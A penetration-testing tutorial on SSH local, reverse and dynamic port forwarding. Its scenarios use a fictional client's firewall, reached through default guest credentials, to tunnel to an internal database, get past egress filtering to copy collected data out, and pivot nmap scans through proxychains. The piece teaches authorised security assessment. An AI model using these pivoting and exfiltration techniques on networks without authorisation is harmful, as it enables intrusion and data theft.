SSH or secure shell is cryptographic network protocol for secure data communication which is used to replace several older unencrypted protocols such as rlogin, rsh and popular telnet protocol. SSH was first evolved to established secure connections with remote machines but today it is used to provide secure data communication, execution of commands remotely, remote login and various other network services between two computers.
Basic TCP Port Forwarding
In a simplest SSH tunnelling, SSH can redirect single TCP port to another end of a connection from one side. This TCP port can be a locally redirected remote port or a local port, redirected on the far end of the connection. These techniques are defined as remote port forwarding or local port forwarding based on the end of connection listening and forwarding. To understand these techniques, we use some scenarios to clarify our doubts and illustrate their use during an assessment.
Local Port Forwarding
In local port forwarding, the connection’s traffic is forwarded to a remote port and the local port is used to listen. This type of port forwarding is used when we want to connect remote network services using the client software running on our machines. We can understand this situation using an example scenario and a diagram:
In a simple penetration testing scenario, a client has tasked you to evaluate external web presence of XYZ widgets. Our client tells us that basically they are using a Linux, Apache, MySQL and PHP stack configuration (LAMP) for their web service. When you start your penetration testing phase, you find that SSH listening on the outside interface is enabled on XYZ’s firewall. When you dig deeper, you find that you can use the default connection to log in. The username and password for this default account is guest/guest. You cannot change any configuration information on the firewall via guest account but port forwarding is enabled. Now you want to impersonate an attacker who will try to make a direct connection with the MySQL database of the website using this loophole.
In this case, a local port is needed to listen and then all traffic is forwarded to the TCP port 3306, commonly used as a remote port for MySQL. To use our machine’s MySQL client without specifying a port, this port is redirect to the same local port. For this purpose, we use this SSH command:
Figure 1: Local Port Forwarding
ssh -N -L 3306:mysql.abc:3306 email@example.com
Here -N flag is used to define that no command is executed because we don’t need any interactive session. Simple port forwarding is being done so these events are not needed. -L flag indicates that local TCP port 3306 is forwarded to mysql.xyz on TCP port 3306.
Now, when we start our MySQL client and then specify the local host on the server, the local port route all the traffic from MySQL client to the remote server’s MySQL port, over a SSH connection.
Reverse Port Forwarding
In reverse port forwarding, all traffic of the connection is forwarded to a port on our local machine and a remote machine’s port is used for listening. Normally, if we want to pass the traffic through a firewall performing Network Address Translation, then we use reverse port forwarding.
Suppose, in another scenario, performing an internal assessment on that same XYZ’ network, if you want to create a backup of the data you have collected on your attack workstation, to perform a demonstration of data exfiltration. But when you try to do this, you found that outbound SSH traffic from your location is restricted so you cannot use SSH secure copy (SCP) function. But you find that you can connect to the ports on the firewall.
Figure 2: Reverse Port Forwarding
Now in this situation, we want a port inside the firewall, listening, which is used to connect to the SSH server running on our attack machine. After that, we only have to use the SCP function with the proper port on the firewall so that the traffic will be forwarded to our local machine. The command used to perform this action is given below:
ssh -N -R 12345:127.0.0.1:22 firstname.lastname@example.org
The -N flag has the similar meaning as in previous example, but -R is responsible to forward a remote TCP port 12345 to our local host’s TCP port 22.
Now we can log into our attack machine, by using port 12345 as the port to connect to from our side, using this command:
scp -P 12345 <data files> email@example.com:/data
Dynamic Port Forwarding
One of the most important features provided by OpenSSH is dynamic port forwarding. As in previous example, both -L and -R commands are used to forward ports in a static manner. To connect to a different machine and port combination, the forward is needed to be changed manually each time. There are methods built in SSH to handle this situation but they are somewhat cumbersome in nature. To solve this problem, concept of Dynamic Port forwarding comes in light. It allows the SSH server to behaves like a “socket secure” or SOCKS proxy. Then a proxy aware application is used to interact with the local port and the traffics looks like coming from the SSH server on the far end.
Not all applications provide proxy support. Such as firefox and many other applications provide support for SOCKS proxy but NMAP does not. In UNIX like system, an application, called “proxychains” is used to act as wrapper for all TCP connections, and enable proxy support for any application. We can access additional network resources through SSH in a single connection, combining dynamic port forwarding and “proxychains”. For example in Backtrack Linux, “proxychains” is already installed and configured to use TCP port 9050.
In another scenario, assessing XYZ network, we want to access other machines in the DMZ along with database server and web server. To do this, we want to use our previous SSH access to perform NMAP scans in the DMZ to find out the machine resides in.
So to perform NMAP scan through “proxychains” with the dynamic port forwarding, we use this command:
ssh -N -D 9050 firstname.lastname@example.org
In this command, -D flag is used to specify the local port, that will be proxied to the other end. Now to perform NMAP scan, we use:
proxychains nmap <options to nmap>
This is a common problem, while doing port forwarding, root access is required when we want to bind port less than 1024. If we are not having the root access, then it can be a problematic scenario. Except this if we want to acquire full access to a network service, appropriate client software must be installed. For example, we need a mail client to access a POP3 server. To use a local port forward, local port 110 is needed to bind, which we’d have root access. There are some mail clients who allow us to change the ports used by various protocols, but many other do not. In this case, a full-featured client may be overkill.
In another example scenario, expanding our assessment of the XYZ network, using NMAP scans, an additional web server is was found in DMZ for XYZ widgets. Because public access to this website is not possible, we use SSH to gather more information about it, by forwarding traffic to it. It is not needed to use a full web browser to connect to it, because we only need to find out what software is it running. For this purpose this command will be used:
ssh email@example.com -W appserver.xyz:80
- -W flag is used to enable “Netcat” After the connection establishment, we connect directly to host:port just like Netcat command.
- After connecting to the web server in “Netcat” mode, we send an improperly formatted HTTP GET request and server sends a reply with Apache version.
In a penetration testing scenario, SSH can be used in many ways. Using SSH forwarding feature, a penetration tester can get access to one machine and then using this machine, can get access to other machines of the network. Good knowledge of SSH forwarding techniques can provide you an edge, while performing other tests on the network.